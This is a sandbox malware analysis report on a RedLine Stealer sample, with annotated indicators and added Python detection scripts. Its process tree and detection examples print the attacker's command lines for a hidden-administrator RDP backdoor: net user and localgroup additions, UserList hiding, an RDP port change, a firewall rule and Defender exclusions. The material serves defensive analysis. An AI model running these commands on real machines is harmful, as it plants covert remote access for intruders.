Analysis
max time kernel: 118s
max time network: 120s
platform: windows7_x64
resource: win7-20241023-en
resource tags: arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system
submitted: 22/12/2024, 02:17
Static task: static1
Behavioral task behavioral1: sample f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe on resource win7-20241023-en
Behavioral task behavioral2: sample f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe on resource win10v2004-20241007-en
General
Target: f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe
Size: 4.1MB
MD5: 166ad2bad1b89030246c845ef575cb09
SHA1: 5875242be7725edd2fc582350d352496d4da1b56
SHA256: f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14
SHA512: c24e79e0adbcb666ac9ba4839441f787cd10fc98a832ae2ecaaffddfa6ffd455f3121bb634e96651931d994426073084bf35685f0372d5b8794e6654640677ef
SSDEEP: 98304:E1E7x7WKpOEYMP8TTjPnPCDexiO75F1Nv6563Y:E1E7x7WFoEWNO1Nxo
Malware Config
Extracted
Family: redline
Botnet: ads6
C2: bhajhhsy6.fun:80
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload (3 IoCs)
YARA rule family_redline matched in memory of PID 2144 (RegAsm.exe):
  behavioral1/memory/2144-70-0x00000000000D0000-0x00000000000EC000-memory.dmp
  behavioral1/memory/2144-71-0x00000000000D0000-0x00000000000EC000-memory.dmp
  behavioral1/memory/2144-67-0x00000000000D0000-0x00000000000EC000-memory.dmp
Redline family

SectopRAT payload (3 IoCs)
YARA rule family_sectoprat matched in the same three dumps of PID 2144:
  behavioral1/memory/2144-70-0x00000000000D0000-0x00000000000EC000-memory.dmp
  behavioral1/memory/2144-71-0x00000000000D0000-0x00000000000EC000-memory.dmp
  behavioral1/memory/2144-67-0x00000000000D0000-0x00000000000EC000-memory.dmp
Sectoprat family
Both family rules fired on the same 0xD0000-0xEC000 region of PID 2144, so this is one in-memory payload matched by two rules rather than two payloads; the extracted configuration (Malware Config above) identifies it as RedLine.

Grants admin privileges (1 TTP)
Uses net.exe to modify the user's privileges. Here the call is net localgroup Administrators EGocAeBsIQ /add (PID 2212, see Processes).

Remote Service Session Hijacking: RDP Hijacking (1 TTP, 2 IoCs)
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
  PID 1668 net.exe
  PID 1520 net1.exe
Both IoCs are the net localgroup "Remote Desktop Users" EGocAeBsIQ /add call and its net1.exe worker. What the sample does is grant RDP to a newly created hidden account, not take over an existing session as the ATT&CK technique name describes; read it as RDP access provisioning.

Blocklisted process makes network request (1 IoC)
  flow 32, PID 1740 WScript.exe
Flow 32 is the same HTTP flow that carries the WinHttp.WinHttpRequest.5 User-Agent listed under Script User-Agent below.
Command and Scripting Interpreter: PowerShell (1 TTP, 8 IoCs)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths and processes.
  PID 2056 powershell.exe
  PID 2080 powershell.exe
  PID 2548 powershell.exe
  PID 2920 powershell.exe
  PID 604 powershell.exe
  PID 2176 powershell.exe
  PID 2888 powershell.exe
  PID 1360 powershell.exe

Modifies RDP port number used by Windows (1 TTP)
reg.exe (PID 1600) sets HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber to 13389 (see Processes); the matching netsh rule then opens that port inbound.

Modifies Windows Firewall (2 TTPs, 5 IoCs)
  PID 1604 netsh.exe
  PID 2424 netsh.exe
  PID 1748 netsh.exe
  PID 2188 netsh.exe
  PID 2820 netsh.exe

Server Software Component: Terminal Services DLL (1 TTP, 3 IoCs)
Set value (str) by RDPWInst.exe, three writes to \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll:
  "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"
  "%SystemRoot%\\System32\\termsrv.dll"
  "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"
The value is pointed at rdpwrap.dll, reset to the stock termsrv.dll, then pointed at rdpwrap.dll again. On a live host, compare the current ServiceDll value against %SystemRoot%\System32\termsrv.dll to know which DLL TermService will load at next start.

Executes dropped EXE (13 IoCs)
  PID 2932 Potere.exe.com
  PID 2812 Potere.exe.com
  PID 2912 Riscalda.exe.com
  PID 2740 Riscalda.exe.com
  PID 2688 Desideri.exe.com
  PID 2092 Desideri.exe.com
  PID 2144 RegAsm.exe
  PID 1920 Potere.exe.com
  PID 2588 RegAsm.exe
  PID 3040 RDPWInst.exe
  PID 1752 RDPWInst.exe
  PID 1280 RDPWInst.exe
  PID 1600 RDPWInst.exe

Loads dropped DLL (13 IoCs)
  PID 2788 cmd.exe (3 loads)
  PID 2092 Desideri.exe.com
  PID 2740 Riscalda.exe.com
  PID 2144 RegAsm.exe
  PID 2588 RegAsm.exe
  PID 2764 cmd.exe (4 loads)
  PID 2276 Process not Found
  PID 2712 svchost.exe
Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials, cookies and similar secrets.

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 4 IoCs)
  flows 23, 8, 9 and 22 to raw.githubusercontent.com

Modifies WinLogon (2 TTPs, 2 IoCs)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" by RDPWInst.exe (written twice).

Password Policy Discovery (1 TTP)
Attempt to access detailed information about the password policy used within an enterprise network. In this run the trigger is net accounts /maxpwage:unlimited (PIDs 2088/2492), which changes the policy rather than reading it: it stops the new account's password from ever expiring.

AutoIT Executable (3 IoCs)
AutoIT scripts compiled to PE executables.
YARA rule autoit_exe matched in memory of PID 2588 (RegAsm.exe):
  behavioral1/memory/2588-80-0x0000000000450000-0x000000000063C000-memory.dmp
  behavioral1/memory/2588-83-0x0000000000450000-0x000000000063C000-memory.dmp
  behavioral1/memory/2588-86-0x0000000000450000-0x000000000063C000-memory.dmp
So the RegAsm.exe instance under Desideri.exe.com hosts a compiled AutoIt payload; it is the process that drives the cscript/schtasks/net chain in the Processes tree, while the sibling RegAsm.exe (PID 2144) hosts RedLine.
Drops file in System32 directory (16 IoCs)
  powershell.exe: File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (4 times) and C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (4 times)
  svchost.exe: File opened for modification C:\Windows\System32\dnsrsvlr.log, C:\Windows\system32\CatRoot2\edb.chk, C:\Windows\system32\CatRoot2\edb.log, C:\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb, C:\Windows\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb, C:\Windows\System32\asyncreg.log
  cmd.exe: File created and File opened for modification C:\Windows\System32\null
The powershell.exe and svchost.exe entries are start-up and service housekeeping (the unexpanded %ProgramData% shortcut path, the catalog database, DNS and registry logs), not files the sample dropped. The one worth a look is C:\Windows\System32\null, created by cmd.exe, which is consistent with a batch redirect to a file literally named "null" instead of the NUL device.

Hide Artifacts: Hidden Users (1 TTP, 2 IoCs)
Set value (int) by reg.exe, the same entry seen through both registry views:
  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\EGocAeBsIQ = "0"
  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\EGocAeBsIQ = "0"
A 0 under SpecialAccounts\UserList removes the account from the Welcome screen and the User Accounts control panel; it stays a full member of Administrators and Remote Desktop Users.
Suspicious use of SetThreadContext (3 IoCs)
  PID 2740 Riscalda.exe.com set thread context of 2144 (RegAsm.exe, procid_target 48)
  PID 2812 Potere.exe.com set thread context of 1920 (Potere.exe.com, procid_target 46)
  PID 2092 Desideri.exe.com set thread context of 2588 (RegAsm.exe, procid_target 47)
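The three SetThreadContext entries above pair with the WriteProcessMemory entries further down into the classic hollowing sequence. As an added example that is not part of the Triage report, the Python below transcribes those pairs (and the PID/image mapping from the Processes tree) and correlates them: a write followed by a thread-context change on the same target is flagged, the target's ancestry is rebuilt from the first writer of each PID, and the ".exe.com" double-extension droppers are listed. The record shape and the confidence ratings are my assumptions, not Triage output.

```python
"""Injection-chain correlation over the SetThreadContext / WriteProcessMemory IoCs.

Added example, not part of the Triage report. The tables below are transcribed
from this page's "Suspicious use of SetThreadContext", "Suspicious use of
WriteProcessMemory" and "Processes" entries (duplicate writes collapsed); the
record shape is an assumption, not a Triage export format.
"""

# pid -> image name, constructed from the Processes tree on this page
IMAGES = {
    1628: "f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe",
    2632: "makecab.exe", 1908: "cmd.exe", 2788: "cmd.exe",
    2888: "findstr.exe", 2828: "findstr.exe", 2832: "findstr.exe", 2772: "PING.EXE",
    2932: "Potere.exe.com", 2812: "Potere.exe.com", 1920: "Potere.exe.com",
    2912: "Riscalda.exe.com", 2740: "Riscalda.exe.com", 2144: "RegAsm.exe",
    2688: "Desideri.exe.com", 2092: "Desideri.exe.com", 2588: "RegAsm.exe",
}

# (writer pid, target pid): every "wrote to memory of" pair, deduplicated
WRITES = [
    (1628, 2632), (1628, 1908), (1908, 2788), (2788, 2888), (2788, 2932),
    (2788, 2828), (2932, 2812), (2788, 2912), (2788, 2832), (2912, 2740),
    (2788, 2688), (2788, 2772), (2688, 2092), (2812, 1920), (2092, 2588),
    (2740, 2144),
]

# (setter pid, target pid): "set thread context of"
CONTEXT_SETS = [(2740, 2144), (2812, 1920), (2092, 2588)]


def parent_map(writes):
    """The first process that writes into a fresh child is its creator;
    later writers are injectors and are ignored for tree purposes."""
    parents = {}
    for writer, target in writes:
        parents.setdefault(target, writer)
    return parents


def ancestry(pid, parents):
    """Root-to-leaf pid chain for `pid`, using the map from parent_map()."""
    chain = [pid]
    while chain[-1] in parents:
        chain.append(parents[chain[-1]])
    return list(reversed(chain))


def hollowing_candidates(images, writes, context_sets):
    """WriteProcessMemory followed by SetThreadContext on the same target is
    the hollowing pair. A target whose image differs from the setter's (a
    renamed .exe.com dropper steering RegAsm.exe) is rated high; a same-image
    self-spawn also occurs in legitimate launchers, so it is rated medium."""
    written = set(writes)
    hits = []
    for setter, target in context_sets:
        if (setter, target) not in written:
            continue
        same_image = images[setter].lower() == images[target].lower()
        hits.append({
            "setter": setter, "target": target,
            "setter_image": images[setter], "target_image": images[target],
            "confidence": "medium" if same_image else "high",
        })
    return hits


def double_extension_images(images):
    """Dropped files such as Potere.exe.com show a fake '.exe' in front of
    the real '.com' extension; list each such image once."""
    return sorted({i for i in images.values()
                   if i.lower().count(".") >= 2
                   and i.lower().endswith((".com", ".exe", ".scr", ".pif"))})


if __name__ == "__main__":
    parents = parent_map(WRITES)
    for h in hollowing_candidates(IMAGES, WRITES, CONTEXT_SETS):
        chain = " > ".join(f"{IMAGES[p]}({p})" for p in ancestry(h["target"], parents))
        print(f"[{h['confidence']}] {h['setter_image']}({h['setter']}) -> "
              f"{h['target_image']}({h['target']})\n    {chain}")
    print("double-extension images:", double_extension_images(IMAGES))
```

Run stand-alone it prints the three injection pairs with the full chain from the submitted sample down to each target, which is the view an analyst wants when deciding which dump to carve the payload from.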
Drops file in Program Files directory (9 IoCs)
  RegAsm.exe: File opened for modification C:\Program Files\RDP Wrapper; File created and File opened for modification C:\Program Files\RDP Wrapper\RDPWInst.exe; File created and File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.bat
  RDPWInst.exe: File created C:\Program Files\RDP Wrapper\rdpwrap.ini (twice); File created C:\Program Files\RDP Wrapper\rdpwrap.dll (twice)

Launches sc.exe (1 IoC)
sc.exe is a Windows utility to control services on the system.
  PID 2216 sc.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Event Triggered Execution: Netsh Helper DLL (1 TTP, 15 IoCs)
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
netsh.exe: Key opened / Key queried / Key value enumerated on \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (12 entries) and \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh (3 entries).
Every entry is a read; no write to the NetSh key appears in the report. This is netsh.exe loading its registered helper list at start-up for the firewall commands, not a helper DLL being registered for persistence.

Permission Groups Discovery: Local Groups (1 TTP)
Attempt to find local system groups and permission settings. Here it is the two WMIC queries, wmic group where sid="S-1-5-32-544" get name /value and the same for S-1-5-32-555 (PIDs 1796 and 2124), which resolve the well-known SIDs of Administrators and Remote Desktop Users to their local names so the later net localgroup calls work on localized systems.
System Location Discovery: System Language Discovery (1 TTP, 64 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by: cmd.exe (15), reg.exe (8), cscript.exe (5), net1.exe (4), findstr.exe (4), RDPWInst.exe (4), powershell.exe (3), net.exe (2), schtasks.exe (2), Desideri.exe.com (2), Riscalda.exe.com (2), Potere.exe.com (2), RegAsm.exe (2), find.exe (2), WMIC.exe (1), sc.exe (1), f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe (1), PING.EXE (1), timeout.exe (1), fsutil.exe (1), makecab.exe (1).
This key is read during ordinary process initialisation, which is why every helper in the tree (findstr, timeout, ping, makecab) appears; on its own the signature carries no signal here.
System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 1 IoC)
Adversaries may check for Internet connectivity on compromised systems.
  PID 2772 PING.EXE

Delays execution with timeout.exe (2 IoCs)
  PID 2796 timeout.exe
  PID 2220 timeout.exe

Runs net.exe

Runs ping.exe (1 TTP, 1 IoC)
  PID 2772 PING.EXE

Scheduled Task/Job: Scheduled Task (1 TTP, 3 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  PID 1924 schtasks.exe
  PID 2440 schtasks.exe
  PID 1712 schtasks.exe
The two calls visible in the Processes tree import the task definition from a file named dsn.dll (schtasks /Create /XML ...\ALKmVbB\dsn.dll) and name the tasks GoogleUpdateTaskMachineUA38 and GoogleUpdateTaskMachineCore48, after the legitimate GoogleUpdateTaskMachineUA and GoogleUpdateTaskMachineCore tasks.

Script User-Agent (1 IoC)
Uses a user-agent string associated with a script host/environment.
  HTTP User-Agent header, flow 32: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses (10 IoCs)
  PID 2056 powershell.exe
  PID 2080 powershell.exe
  PID 2888 powershell.exe
  PID 2548 powershell.exe
  PID 2712 svchost.exe (twice)
  PID 2920 powershell.exe
  PID 604 powershell.exe
  PID 1360 powershell.exe
  PID 2176 powershell.exe

Suspicious behavior: LoadsDriver (4 IoCs)
  PID 2276 Process not Found
  PID 1776 Process not Found
  PID 2712 svchost.exe (twice)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  PID 2144 RegAsm.exe: SeDebugPrivilege
  PID 1796 WMIC.exe, the following set twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  PID 2124 WMIC.exe: the same 20 privileges once, then SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege (the table is capped at 64 entries)
WMIC.exe enabling every privilege in its token is its normal start-up behaviour; the entry that matters is SeDebugPrivilege in RegAsm.exe (PID 2144), the process holding the RedLine payload.
Suspicious use of WriteProcessMemory (64 IoCs)
writer PID and image -> target PID (procid_target), number of writes:
  1628 f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe -> 2632 (31), 4
  1628 f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe -> 1908 (33), 4
  1908 cmd.exe -> 2788 (35), 4
  2788 cmd.exe -> 2888 (36), 4
  2788 cmd.exe -> 2932 (37), 4
  2788 cmd.exe -> 2828 (38), 4
  2932 Potere.exe.com -> 2812 (39), 4
  2788 cmd.exe -> 2912 (40), 4
  2788 cmd.exe -> 2832 (41), 4
  2912 Riscalda.exe.com -> 2740 (42), 4
  2788 cmd.exe -> 2688 (43), 4
  2788 cmd.exe -> 2772 (44), 4
  2688 Desideri.exe.com -> 2092 (45), 4
  2812 Potere.exe.com -> 1920 (46), 4
  2092 Desideri.exe.com -> 2588 (47), 7
  2740 Riscalda.exe.com -> 2144 (48), 1 (the table is capped at 64 entries)
Four writes into a freshly created child is what this sandbox records for an ordinary process creation; the pairs that also appear under SetThreadContext (2812->1920, 2092->2588, 2740->2144) are the hollowing writes, with RedLine ending up in 2144 and the AutoIt payload in 2588.
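Taken together, the net.exe, reg.exe, netsh.exe, schtasks.exe and powershell.exe command lines in the Processes section below, plus the RDPWInst.exe registry writes above, are the whole RDP-backdoor set-up: create an account, hide it from the logon screen, put it in Administrators and Remote Desktop Users, stop its password expiring, move RDP to 13389, open the firewall, exclude the drop paths from Defender, and swap termsrv.dll for rdpwrap.dll. As an added example that is not from the Triage report, the Python below encodes each step as a rule over simplified process-creation and registry-set records constructed from those command lines, then intersects the account-related hits so that only an account that was created, hidden and granted RDP is called a backdoor. The event format and the rule names are mine; a benign "net user alice /add" control is included to show the intersection rejecting it.

```python
"""Command-line and registry rules for the RDP-backdoor set-up in this report.

Added example, not part of the Triage report. EVENTS is constructed from the
command lines in the Processes tree and the registry writes in the signature
tables; the record shape (type/pid/image/cmdline or key/value) is an assumed
simplification of Sysmon process-creation and registry-set events, not
Triage's own format. Rule names are mine.
"""
import re


def _rx(pattern):
    return re.compile(pattern, re.IGNORECASE | re.DOTALL)


# Each rule captures the one detail worth reporting (account, port, path) in group "d".
CMD_RULES = {
    "account_created": _rx(r"\bnet1?\s+user\s+(?P<d>\S+)(?:\s+\S+)?\s+/add\b"),
    "added_to_administrators": _rx(r"localgroup\s+administrators\s+(?P<d>\S+)\s+/add\b"),
    "added_to_rdp_users": _rx(r'localgroup\s+"?remote desktop users"?\s+(?P<d>\S+)\s+/add\b'),
    "user_hidden_from_logon": _rx(r'specialaccounts\\userlist"?\s+/v\s+(?P<d>\S+).*?/d\s+"?0+"?'),
    "rdp_port_changed": _rx(r"winstations\\rdp-tcp.*?portnumber.*?/d\s+(?P<d>\d+)"),
    "firewall_inbound_allow": _rx(r"advfirewall\s+firewall\s+add\s+rule(?=.*action=allow).*?dir=in.*?localport=(?P<d>\d+)"),
    "defender_exclusion_added": _rx(r"add-mppreference.*?-exclusion(?:path|extension|process)\s+(?P<d>\S+)"),
    "password_expiry_disabled": _rx(r"\bnet1?\s+accounts\s+/maxpwage:(?P<d>unlimited)"),
    "schtasks_from_xml": _rx(r'/create\b.*?/xml\s+"(?P<d>[^"]+)"'),
}

EVENTS = [  # constructed from this page; the last record is a benign control
    {"type": "process", "pid": 2452, "image": "net.exe",
     "cmdline": "net user EGocAeBsIQ UceSTiIhIr /add"},
    {"type": "process", "pid": 2212, "image": "net.exe",
     "cmdline": "net localgroup Administrators EGocAeBsIQ /add"},
    {"type": "process", "pid": 1668, "image": "net.exe",
     "cmdline": 'net localgroup "Remote Desktop Users" EGocAeBsIQ /add'},
    {"type": "process", "pid": 2088, "image": "net.exe",
     "cmdline": "net accounts /maxpwage:unlimited"},
    {"type": "process", "pid": 2536, "image": "reg.exe",
     "cmdline": r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v EGocAeBsIQ /t REG_DWORD /d "00000000" /f'},
    {"type": "process", "pid": 1600, "image": "reg.exe",
     "cmdline": r'reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f'},
    {"type": "process", "pid": 1604, "image": "netsh.exe",
     "cmdline": 'netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389'},
    {"type": "process", "pid": 2056, "image": "powershell.exe",
     "cmdline": 'powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"'},
    {"type": "process", "pid": 1712, "image": "schtasks.exe",
     "cmdline": r'schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineUA38"'},
    {"type": "registry", "image": "RDPWInst.exe",
     "key": r"HKLM\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll",
     "value": r"%ProgramFiles%\RDP Wrapper\rdpwrap.dll"},
    {"type": "registry", "image": "RDPWInst.exe",  # reset to stock: must not fire
     "key": r"HKLM\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll",
     "value": r"%SystemRoot%\System32\termsrv.dll"},
    {"type": "registry", "image": "RDPWInst.exe",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions",
     "value": "1"},
    {"type": "process", "pid": 4000, "image": "net.exe",  # benign control: created, neither hidden nor RDP-enabled
     "cmdline": "net user alice /add"},
]


def detect(events):
    """One hit per (event, rule) match. Registry rules are inline because they
    compare the written value rather than a command line."""
    hits = []
    for ev in events:
        if ev["type"] == "process":
            for name, rx in CMD_RULES.items():
                m = rx.search(ev["cmdline"])
                if not m:
                    continue
                detail = m.group("d")
                # A task definition is only suspicious when it hides under a non-.xml name
                if name == "schtasks_from_xml" and detail.lower().endswith(".xml"):
                    continue
                hits.append({"rule": name, "pid": ev["pid"], "image": ev["image"], "detail": detail})
        elif ev["type"] == "registry":
            key, val = ev["key"].lower(), ev["value"].lower()
            if key.endswith(r"termservice\parameters\servicedll") and not val.endswith(r"\termsrv.dll"):
                hits.append({"rule": "termservice_dll_replaced", "pid": ev.get("pid"), "image": ev["image"], "detail": ev["value"]})
            elif key.endswith(r"winlogon\allowmultipletssessions") and val == "1":
                hits.append({"rule": "multiple_ts_sessions_enabled", "pid": ev.get("pid"), "image": ev["image"], "detail": ev["value"]})
    return hits


def backdoor_accounts(hits):
    """Accounts that were created, hidden from the logon screen and granted RDP.
    The three-way intersection turns noisy single rules into a confident verdict."""
    by_rule = {}
    for h in hits:
        by_rule.setdefault(h["rule"], set()).add(h["detail"])
    return (by_rule.get("account_created", set())
            & by_rule.get("user_hidden_from_logon", set())
            & by_rule.get("added_to_rdp_users", set()))


if __name__ == "__main__":
    found = detect(EVENTS)
    for h in found:
        print(f"{h['rule']:<30} pid={h['pid']} {h['image']}: {h['detail']}")
    print("hidden RDP backdoor accounts:", backdoor_accounts(found))
```

The single rules are deliberately loose (any net user /add fires account_created) so that they also catch variants that use net1.exe directly or quote the group name differently; the verdict comes from backdoor_accounts, which requires the same account name across creation, UserList hiding and Remote Desktop Users membership.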
Processes
(indented by parent; each entry shows image path, PID, command line, and the signatures matched on that process)

[1] C:\Users\Admin\AppData\Local\Temp\f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe (PID 1628)
    cmd: "C:\Users\Admin\AppData\Local\Temp\f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\makecab.exe (PID 2632)
      cmd: "C:\Windows\System32\makecab.exe"
      - System Location Discovery: System Language Discovery
  [2] C:\Windows\SysWOW64\cmd.exe (PID 1908)
      cmd: "C:\Windows\System32\cmd.exe" /c FHaltkaUYOvf & xkCNwAXEEDcq & BsWHxifyTEoE & cmd < Rimasta.xltx
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe (PID 2788)
        cmd: cmd
        - Loads dropped DLL
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\findstr.exe (PID 2888)
          cmd: findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
          - System Location Discovery: System Language Discovery
      [4] C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com (PID 2932)
          cmd: Potere.exe.com A
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com (PID 2812)
            cmd: C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com A
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
          [6] C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com (PID 1920)
              cmd: C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
              - Executes dropped EXE
      [4] C:\Windows\SysWOW64\findstr.exe (PID 2828)
          cmd: findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
          - System Location Discovery: System Language Discovery
      [4] C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com (PID 2912)
          cmd: Riscalda.exe.com Z
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com (PID 2740)
            cmd: C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com Z
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of SetThreadContext
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
          [6] C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe (PID 2144)
              cmd: C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
              - Executes dropped EXE
              - Loads dropped DLL
              - System Location Discovery: System Language Discovery
              - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\findstr.exe (PID 2832)
          cmd: findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
          - System Location Discovery: System Language Discovery
      [4] C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com (PID 2688)
          cmd: Desideri.exe.com G
          - Executes dropped EXE
          - System Location Discovery: System Language Disc
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com (PID 2092)
            cmd: C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com G
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of SetThreadContext
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
          [6] C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe (PID 2588)
              cmd: C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
              - Executes dropped EXE
              - Loads dropped DLL
              - Drops file in Program Files directory
              - System Location Discovery: System Language Discovery
